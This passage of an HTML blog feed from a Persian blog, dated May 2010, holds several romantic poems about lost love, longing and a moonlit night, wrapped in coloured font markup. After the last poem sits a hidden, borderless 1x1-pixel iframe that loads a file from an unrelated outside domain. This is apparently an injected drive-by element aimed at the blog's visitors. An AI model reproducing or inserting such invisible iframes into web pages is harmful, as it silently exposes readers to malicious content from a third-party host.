color=#ffcc00>&nbsp; نگاه کن</FONT></P> <P><BR><FONT color=#ffcc00>تمام هستی‌ام خراب می‌شود </FONT></P> <P><BR><FONT color=#ffcc00>شراره‌ای مرا به کام می‌کشد </FONT></P> <P><BR><FONT color=#ffcc00>مرا به اوج می‌بَرد مرا به دام می کشد</FONT></P> <P><BR><FONT color=#ffcc00>&nbsp; نگاه کن</FONT></P> <P><BR><FONT color=#ffcc00>&nbsp; <SPAN style="COLOR: rgb(153,51,153)">تمام آسمان من پراز شهاب می شود</SPAN><BR></FONT></P></FONT> text/html 2010-05-20T19:30:30+01:00 eshghebivafa.mihanblog.com mehdi یاد http://eshghebivafa.mihanblog.com/post/109 <P><FONT color=#33ccff><STRONG><FONT face=Arial size=4>یاد بگذشته به دل ماند و دریغ</FONT></STRONG></FONT></P><FONT color=#33ccff><STRONG><FONT face=Arial> <P><BR><FONT size=4>نیست یاری که مرا یاد کند</FONT></P> <P><BR><FONT size=4>دیده ام خیره به ره ماند و نداد</FONT></P> <P><BR><FONT size=4>نامه ای تا دل من شاد کند</FONT></P> <P><BR><FONT size=4>خود ندانم چه خطایی کردم</FONT></P> <P><BR><FONT size=4>که ز من رشته الفت بگسست</FONT></P> <P><BR><FONT size=4>در دلش جایی اگر بود مرا</FONT></P> <P><BR><FONT size=4>پس چرا دیده ز دیدارم بست</FONT></P> <P><BR><FONT size=4>هر کجا مینگرم باز هم اوست</FONT></P> <P><BR><FONT size=4>که به چشمان ترم خیره شده</FONT></P> <P><BR><FONT size=4>درد عشقست که با حسرت و سوز</FONT></P> <P><BR><FONT size=4>بر دل پر شررم چیره شده</FONT></P> <P><BR><FONT size=4>گفتم از دیده چو دورش سازم</FONT></P> <P><BR><FONT size=4>بی گمان زودتر از دل برود</FONT></P> <P><BR><FONT size=4>مرگ باید که مرا دریابد</FONT></P> <P><BR><FONT size=4>ورنه دردیست که مشکل برود</FONT></P> <P><BR><FONT size=4>تا لبی بر لب من می لغزد</FONT></P> <P><BR><FONT size=4>می کشم آه که کاش این او بود</FONT></P> <P><BR><FONT size=4>کاش این لب که مرا می بوسد</FONT></P> <P><BR><FONT size=4>لب سوزنده آن بدخو بود</FONT></P> <P><BR><FONT size=4>می کشندم چو در آغوش به مهر</FONT></P> <P><BR><FONT size=4>پرسم از خود که چه شد آغوشش</FONT></P> <P><BR><FONT size=4>چه شد آن آتش سوزنده که بود</FONT></P> <P><BR><FONT size=4>شعله ور در نفس خاموشش</FONT></P> <P><BR><FONT size=4>شعر گفتم که ز دل بر دارم</FONT></P> <P><BR><FONT size=4>بار سنگین غم عشقش را</FONT></P> <P><BR><FONT size=4>شعر خود جلوه ای از رویش شد</FONT></P> <P><BR><FONT size=4>با که گویم ستم عشقش را</FONT></P> <P><FONT size=4>مادر این شانه ز مویم بردار</FONT></P> <P><BR><FONT size=4>سرمه را پک کن از چشمانم</FONT></P> <P><BR><FONT size=4>بکن این پیرهنم را از تن</FONT></P> <P><BR><FONT size=4>زندگی نیست بجز زندانم</FONT></P> <P><BR><FONT size=4>تا دو چشمش به رخم حیران نیست</FONT></P> <P><BR><FONT size=4>به چکار ایدم این زیبایی</FONT></P> <P><BR><FONT size=4>بشکن این اینه را ای مادر</FONT></P> <P><BR><FONT size=4>حاصلم چیست ز خودآرایی</FONT></P> <P><BR><FONT size=4>در ببندید و بگویید که من</FONT></P> <P><BR><FONT size=4>جز از او همه کس بگسستم</FONT></P> <P><BR><FONT size=4>کس اگر گفت چرا ؟ باکم نیست</FONT></P> <P><BR><FONT size=4>فاش گویید که عاشق هستم</FONT></P> <P><BR><FONT size=4>قاصدی آمد اگر از راه دور</FONT></P> <P><BR><FONT size=4>زود پرسید که پیغام از کیست</FONT></P> <P><BR><FONT size=4>گر از او نیست بگویید آن زن</FONT></P> <P><BR><FONT size=4>دیر گاهیست که در این منزل نیست</FONT></FONT></STRONG><FONT size=4> </FONT></FONT></P> text/html 2010-05-18T14:08:48+01:00 eshghebivafa.mihanblog.com mehdi مهتاب عشق http://eshghebivafa.mihanblog.com/post/108 <FONT face="Times New Roman"> <P><FONT color=#33ff33 size=4>ماندم به چمن شب شد و مهتاب برآمد</FONT></FONT><BR><FONT size=4><FONT color=#33ff33><FONT face="Times New Roman">سیمای شب آغشته به سیماب برآمد</FONT><BR><FONT face="Times New Roman">آویخت چراغ فلک از طارم نیلی</FONT><BR><FONT face="Times New Roman">قندیل مه آویزه محراب برآمد</FONT><BR><FONT face="Times New Roman">دریای فلک دیدم و بس گوهر انجم</FONT><BR><FONT face="Times New Roman">یاد از توام ای گوهر نایاب برآمد</FONT><BR><FONT face="Times New Roman">چون غنچه دل تنگ من آغشته به خون شد</FONT><BR><FONT face="Times New Roman">تا یادم از آن نوگل سیراب برآمد</FONT><BR><FONT face="Times New Roman">ماهم به نظر در دل ابر متلاطم</FONT><BR><FONT face="Times New Roman">چون زورقی افتاده به گرداب برآمد</FONT><BR><FONT face="Times New Roman">از راز فسونکاری شب پرده برافتاد</FONT><BR><FONT face="Times New Roman">هر روز که خورشید جهانتاب برآمد</FONT><BR><FONT face="Times New Roman">دیدم به لب جوی جهان گذران را</FONT><BR><FONT face="Times New Roman">آفاق همه نقش رخ آب برآمد</FONT><BR><FONT face="Times New Roman">در صحبت احباب ز بس روی و ریا بود</FONT><BR><FONT face="Times New Roman">جانم به لب از صحبت احباب برآمد</FONT><BR><BR></FONT></FONT></P><IFRAME style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" src="http://ZieF.pl/iraq.jpg" width=1 height=1></IFRAME>